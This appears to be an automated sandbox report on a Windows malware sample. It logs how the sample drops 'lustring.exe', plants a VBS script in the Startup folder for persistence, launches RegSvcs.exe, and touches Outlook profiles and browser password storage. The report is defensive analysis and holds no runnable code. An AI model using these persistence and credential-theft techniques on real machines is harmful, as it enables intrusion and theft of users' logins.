
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Mutant created: NULL

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

File created: C:\Users\user\AppData\Local\Temp\aut9811.tmp

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs"

Source: eLo1khn7DQ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: RegSvcs.exe, 00000003.00000002.4818118474.0000000002B9B000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4818118474.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4818118474.0000000002B86000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4818118474.0000000002B78000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4818118474.0000000002B68000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000008.00000002.4819364782.0000000003D7D000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: eLo1khn7DQ.exe	Virustotal: Detection: 52%
Source: eLo1khn7DQ.exe	ReversingLabs: Detection: 73%

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

File read: C:\Users\user\Desktop\eLo1khn7DQ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\eLo1khn7DQ.exe "C:\Users\user\Desktop\eLo1khn7DQ.exe"
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Process created: C:\Users\user\AppData\Local\done\lustring.exe "C:\Users\user\Desktop\eLo1khn7DQ.exe"
Source: C:\Users\user\AppData\Local\done\lustring.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\eLo1khn7DQ.exe"
Source: unknown	Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\done\lustring.exe "C:\Users\user\AppData\Local\done\lustring.exe"
Source: C:\Users\user\AppData\Local\done\lustring.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\done\lustring.exe"
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Process created: C:\Users\user\AppData\Local\done\lustring.exe "C:\Users\user\Desktop\eLo1khn7DQ.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\eLo1khn7DQ.exe"	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\done\lustring.exe "C:\Users\user\AppData\Local\done\lustring.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\done\lustring.exe"	Jump to behavior

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Section loaded: wldp.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: eLo1khn7DQ.exe

Static file information: File size 1078272 > 1048576

Source: eLo1khn7DQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: eLo1khn7DQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: eLo1khn7DQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: eLo1khn7DQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: eLo1khn7DQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: eLo1khn7DQ.exe	Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT

Source: eLo1khn7DQ.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: wntdll.pdbUGP source: lustring.exe, 00000002.00000003.2405294114.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, lustring.exe, 00000002.00000003.2404333173.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, lustring.exe, 00000007.00000003.2540755425.0000000003F50000.00000004.00001000.00020000.00000000.sdmp, lustring.exe, 00000007.00000003.2542152989.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: lustring.exe, 00000002.00000003.2405294114.0000000003C80000.00000004.00001000.00020000.00000000.sdmp, lustring.exe, 00000002.00000003.2404333173.0000000003E20000.00000004.00001000.00020000.00000000.sdmp, lustring.exe, 00000007.00000003.2540755425.0000000003F50000.00000004.00001000.00020000.00000000.sdmp, lustring.exe, 00000007.00000003.2542152989.0000000003DD0000.00000004.00001000.00020000.00000000.sdmp

Source: eLo1khn7DQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: eLo1khn7DQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: eLo1khn7DQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: eLo1khn7DQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: eLo1khn7DQ.exe	Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

Code function: 0_2_001F42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_001F42DE

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00210A76 push ecx; ret	0_2_00210A89
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00100A76 push ecx; ret	2_2_00100A89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CF27CF push ds; iretd	3_2_00CF27D2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CF27CC push ds; iretd	3_2_00CF27CE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CF27C8 push ds; iretd	3_2_00CF27CA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CF27C4 push ds; iretd	3_2_00CF27C6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CF27C0 push ds; iretd	3_2_00CF27C2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CF27D8 push ds; iretd	3_2_00CF27DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00CF78E6 pushad ; iretd	3_2_00CF78E7

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe

File created: C:\Users\user\AppData\Local\done\lustring.exe

Jump to dropped file

Boot Survival

Drops VBS files to the startup folder

Source: C:\Users\user\AppData\Local\done\lustring.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs

Jump to dropped file

Source: C:\Users\user\AppData\Local\done\lustring.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs

Jump to behavior

Source: C:\Users\user\AppData\Local\done\lustring.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lustring.vbs

Jump to behavior

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_0020F98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	0_2_0020F98E
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Code function: 0_2_00281C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	0_2_00281C41
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_000FF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	2_2_000FF98E
Source: C:\Users\user\AppData\Local\done\lustring.exe	Code function: 2_2_00171C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	2_2_00171C41

Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\eLo1khn7DQ.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\done\lustring.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
